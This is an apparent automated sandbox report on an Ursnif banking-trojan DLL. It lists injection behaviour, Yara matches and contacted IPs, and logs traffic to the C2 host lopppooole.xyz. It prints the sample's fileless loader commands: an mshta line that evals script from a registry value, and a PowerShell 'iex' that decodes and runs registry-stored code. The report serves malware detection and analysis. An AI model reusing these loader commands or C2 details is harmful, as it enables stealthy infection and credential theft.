Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04399363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_04399363

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_04395ECD

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04391007 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_04391007

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04393589 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

1_2_04393589

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread created: unknown EIP: 736E1580

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: unknown protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 5728			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8C67.tmp' 'c:\Users\user\AppData\Local\Temp\crd40oh3\CSC11E966FB2F624BF1AF64E9C63E9FBAC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9D01.tmp' 'c:\Users\user\AppData\Local\Temp\pzrffmak\CSCDD4D36881852409F9BC7C75CEAE11B9.TMP'

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04398436 cpuid

1_2_04398436

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_043912B3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_043912B3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0439F46C GetSystemTimeAsFileTime,HeapFree,

1_2_0439F46C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0438B96C RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

1_2_0438B96C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04385CA8 SleepEx,GetVersion,GetModuleHandleA,GetProcAddress,

1_2_04385CA8

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.186.244.49	unknown	Netherlands		35415	WEBZILLANL	false
151.101.1.44	unknown	United States		54113	FASTLYUS	false

Contacted Domains

Name	IP	Active
contextual.media.net	92.122.146.68	true
tls13.taboola.map.fastly.net	151.101.1.44	true
hblg.media.net	92.122.146.68	true
lg3.media.net	92.122.146.68	true
resolver1.opendns.com	208.67.222.222	true
lopppooole.xyz	185.186.244.49	true
web.vortex.data.msn.com	unknown	unknown
www.msn.com	unknown	unknown
1.0.0.127.in-addr.arpa	unknown	unknown
srtb.msn.com	unknown	unknown
img.img-taboola.com	unknown	unknown
8.8.8.8.in-addr.arpa	unknown	unknown
cvision.media.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lopppooole.xyz/manifest/9dBougJwDtiqZ/QQHMIVU_/2BhS1knkkKX_2FVufwZ0oyN/EbGuCLEAI8/LnviyVmU_2BJ7xAua/uY77q6VVLGV8/agEg6nrSlO8/ECdHQy5W4nMbRU/wngAS3IMky7ngjR5nSGPQ/K9l7rtKzY6Pm4I7S/PgkTHSMkne_2BL6/avNSLX3b9xZHhQcrwM/KqzdjJJ_2/BoGyL5Rb/hdm5SZ8.cnx	false	Avira URL Cloud: safe	unknown
http://lopppooole.xyz/manifest/vduANE3J_2Bc1JVCe/mGf1TVDsPl7d/IwOe5xT417F/r0djERcwNagbl3/secUFuGZN4k2hLpDAmqZ_/2B14CbUSwUpX_2Fi/39R3WtzGANArbeD/to_2F84kphfq2hxfRa/eViH_2Bcq/DU4QxfFdXEk1hh6ELb0S/LXfZS2VQbBBYXjDtBzf/6HdWO2UjIqCLslcJOFOPGY/_2FVMnTrB/_2B.cnx	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: regsvr32.exe.4688.1.memstr

Compliance:

Uses 32bit PE files

Source: 6007d134e83fctar.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49741 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: 6007d134e83fctar.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.411809654.000001F23FCA0000.00000002.00000001.sdmp, csc.exe, 00000026.00000002.422411494.000001D454620000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: 6007d134e83fctar.dll
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdbXP source: powershell.exe, 00000020.00000002.450999766.000001AE45C50000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdbXP source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_043A056C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438BF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_0438BF1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_0439AF0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04399363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_04399363

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_04395ECD

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 151.101.1.44 151.101.1.44

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /manifest/9dBougJwDtiqZ/QQHMIVU_/2BhS1knkkKX_2FVufwZ0oyN/EbGuCLEAI8/LnviyVmU_2BJ7xAua/uY77q6VVLGV8/agEg6nrSlO8/ECdHQy5W4nMbRU/wngAS3IMky7ngjR5nSGPQ/K9l7rtKzY6Pm4I7S/PgkTHSMkne_2BL6/avNSLX3b9xZHhQcrwM/KqzdjJJ_2/BoGyL5Rb/hdm5SZ8.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: lopppooole.xyzConnection: Keep-AliveCookie: PHPSESSID=cklnirt54us2267ioh1bdjd451; lang=en
Source: global traffic	HTTP traffic detected: GET /manifest/vduANE3J_2Bc1JVCe/mGf1TVDsPl7d/IwOe5xT417F/r0djERcwNagbl3/secUFuGZN4k2hLpDAmqZ_/2B14CbUSwUpX_2Fi/39R3WtzGANArbeD/to_2F84kphfq2hxfRa/eViH_2Bcq/DU4QxfFdXEk1hh6ELb0S/LXfZS2VQbBBYXjDtBzf/6HdWO2UjIqCLslcJOFOPGY/_2FVMnTrB/_2B.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=cklnirt54us2267ioh1bdjd451
Source: global traffic	HTTP traffic detected: GET /manifest/vZLK0d4lARH3Q_2BrO_/2FsO_2F2nRs6X2oi1Zey6b/w_2BPzCyb9qWu/aUJj6fj9/AoW2RxwV5jVAuuIZ6tg8Vss/9LOe5w8WWk/h4UkM31kYpKt809d8/y04pjwYJwpB4/tTLboWwUU5K/KwHKzEhmg_2FCK/0RXjauzqdq7mdbzD87Bzs/Wj_2BxZ5qHCgyoUo/tDRuRFtxq/6W5SEq8I/P.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=cklnirt54us2267ioh1bdjd451

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8a7b0678,0x01d6ef43</date><accdate>0x8a7b0678,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8a7b0678,0x01d6ef43</date><accdate>0x8a7b0678,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8a822dab,0x01d6ef43</date><accdate>0x8a822dab,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8a822dab,0x01d6ef43</date><accdate>0x8a848ff9,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8a848ff9,0x01d6ef43</date><accdate>0x8a848ff9,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8a848ff9,0x01d6ef43</date><accdate>0x8a848ff9,0x01d6ef43</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
